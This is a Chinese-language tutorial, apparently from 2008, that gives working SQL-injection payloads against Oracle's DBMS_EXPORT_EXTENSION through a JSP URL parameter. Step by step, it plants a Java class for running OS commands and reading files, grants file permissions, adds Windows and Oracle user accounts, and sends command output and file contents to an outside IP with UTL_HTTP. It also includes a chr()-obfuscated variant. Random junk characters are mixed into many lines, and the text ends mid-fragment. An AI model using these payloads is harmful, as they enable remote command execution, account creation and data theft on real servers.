以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 5 H5 d5 O! F: N3 }! A7 U+ S3 Q
( e( N7 ~$ {: V6 L( h$ j
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
: w/ i. B* k- I0 q) W的形式即可。(用" 'a'|| "是为了让语句返回true值) - M$ i1 s. N) V* t, \ ^: }! ?
语句有点长,可能要用post提交。 * q9 _- J- s9 \5 F1 {* p* }
以下是各个步骤:
- H O4 {2 ?, f1.创建包 ' F4 j2 W0 \# R4 E8 Y5 ?6 h0 |: \4 n7 N
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:$ R" `6 S. \1 s$ A. h3 [6 b
/xxx.jsp?id=1 and '1'<>'a'||(
6 f; F; L( K& K Q! f/ p1 C+ |select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') z W5 m8 M9 X4 w4 c# X
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) `% R8 k1 Y2 unew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
7 J4 w" }2 e4 ^/ E5 {; P/ O7 ^$ b}'''';END;'';END;--','SYS',0,'1',0) from dual 0 |$ l! J! }# M. q5 P
) 2 `, ^4 [3 k" `% j: [
------------------------
% V# ~" ^5 _! I2 y$ N' o9 ~& T" Y如果url有长度限制,可以把readFile()函数块去掉,即: / R3 A( p. _( i/ s
/xxx.jsp?id=1 and '1'<>'a'||(
! M, V& P! U% Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( K9 X' j9 s* E7 hcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 ?) B4 B# N8 a- vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
! J' I/ x2 [; ^3 M3 J}'''';END;'';END;--','SYS',0,'1',0) from dual
B0 o; _: q7 N; G* X& z* w) 7 P: ?$ u5 N" Q a& `
同时把后面步骤 提到的 对readFile()的处理语句去掉。 5 j5 I1 E, W, n9 p, E6 V' E6 @
------------------------------
: m$ z% }+ N( a2 p/ G2.赋Java权限
1 s$ S* _9 T! C0 K( lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual6 W+ _6 F& p# J. P# L
3.创建函数
( ]- I; R' K5 P- Y, j9 H5 u$ W- eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" y5 e$ ]6 H( {: J# W
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual/ X8 \, W: R5 S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" M9 i0 [) Z+ k' l- B4 t
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
/ T9 @2 E8 T$ X# s- P" g4.赋public执行函数的权限 ; @5 {! p6 j u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
# ~& c+ l, j) E3 I1 vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual. X/ `; h8 H. I2 o0 N* h! N
5.测试上面的几步是否成功
/ G; d/ R" O, X' [! L# Wand '1'<>'11'||(
0 P7 c6 W5 i( i& }- N! ?select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' . } u$ O4 w4 S8 X$ k9 ~4 D
) " u! h3 g0 g: m* F
and '1'<>(
) Y: p8 v( H m- xselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 0 t y# n3 ]: a/ O1 e* {
) , O; R5 C- g/ [) I0 [
6.执行命令: 5 T4 }0 G3 r2 ~1 A% L
/xxx.jsp?id=1 and '1'<>(
" O7 i- q/ g, cselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
3 y7 p5 Z' y, R$ |5 @3 X. ]$ m- w. C6 J
) 2 O9 q# z% H# G! ?0 Q+ J
/xxx.jsp?id=1 and '1'<>(
6 V0 ?+ B! w( gselect sys.LinxReadFile('c:/boot.ini') from dual
' \2 R! `* I5 V( I w5 q! O, s+ M: \/ z: `
)
7 {3 p; N( L$ ~; G 4 b* h# l+ H5 ]
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 9 v4 v8 M- E6 I) p/ c
如果要查看运行结果可以用 union : * u6 H/ v% E/ }+ T: e. P/ i/ o+ l
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
) O* ^5 J( }/ t4 Z5 ^或者UTL_HTTP.request(: ' M- b: M' c4 O8 m' z- P
/xxx.jsp?id=1 and '1'<>(
/ \$ T1 O2 \1 Z& E/ B! L9 dSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual2 u3 f$ e7 w# @- U9 Y$ a5 K h
)
7 q# K2 P8 ~1 W% I+ j/xxx.jsp?id=1 and '1'<>(
7 e/ {) ]/ g9 L# S; \! ?% G& V* LSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
- D1 D) X6 b+ [0 f% y4 Z! ]4 Y) " s2 f$ Q O9 }% q
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。4 S" }- Y H- ^4 c
-------------------- P8 g: r" P! R' i e n' ^
6.内部变化 - _! U5 c/ w# |' g4 R
通过以下命令可以查看all_objects表达改变:
; q2 c: ]/ X/ u) h% L+ x- y) n" Mselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
2 |6 h6 e! x* L7 q) U7.删除我们创建的函数 8 c4 l! _1 `) D" y) X, r8 F$ K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W. [& [ k/ odrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual ) a( m+ @( M2 S
====================================================
" i) {1 r" R5 O: M V/ P# T1 z2 O全文结束。谨以此文赠与我的朋友。
3 |) e G! u$ Q+ tlinx
# b; R% d$ z1 e: V u e; y124829445
' \; ]8 |- m" K0 k/ g# j2008.1.12 , @; f" j2 y( j3 h0 l R: x
linyujian@bjfu.edu.cn
5 u& D8 H$ h' [' @) d* O6 y======================================================================
, _/ V" Y" ]8 a. i, H测试漏洞的另一方法: # e! ]# z! ], W4 q+ R
创建oracle帐号:
0 B, e5 y* L: Q2 c( [! c* I4 Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" `, Q# ^, E' T$ `4 g* `
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual! u! j* S. i/ r5 G' D" S3 H
即:
$ T" O) z7 n7 T9 B- B2 [7 pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),$ \* Z" i9 u4 ^1 K5 c" J# i! k
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual . ]7 l5 d Y$ c( M6 H1 S, [# O
确定漏洞存在: $ B( R$ c) H3 v+ i: ]2 h% ~. V+ w
1<>( & v' b& @7 q; f' d5 N3 U- t
select user_id from all_users where username='LINXSQL' : x* ]+ g; R4 f% o3 D* V8 M
)
' ^& d T/ R/ p: H1 D' H' M给linxsql连接权限:
' S& B. O5 M0 |1 f' |+ x: \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 |6 S$ y, Z: ~3 ]% i# O1 T
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual , y. R q% V6 y9 }$ c
删除帐号:
4 n! K$ ~# ]9 w9 J3 Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ C/ w+ L' C \ I U' [. O( {2 _drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
, C6 @- F, V! H7 U7 a======================
3 m+ v l0 M- T$ q( H, W" V M9 j! q以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:- ]( `% j* L1 W6 h" D; L/ Q3 Q* j
1.jsp?id=1 and '1'<>( 4 v. l5 Z5 X8 P1 ]& F v/ M( ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# R+ E5 o1 n8 Y2 j" c* }create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual5 H) B7 v) v( q" G2 L
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE0 V0 F/ L$ J" G- E) M
)
; q, t% G2 o( J' O2 D1 E" Y& e" [0 F& }( [
+ a/ ]* u. v8 y% f( d s: {: V5 P! G$ M$ i% ?
|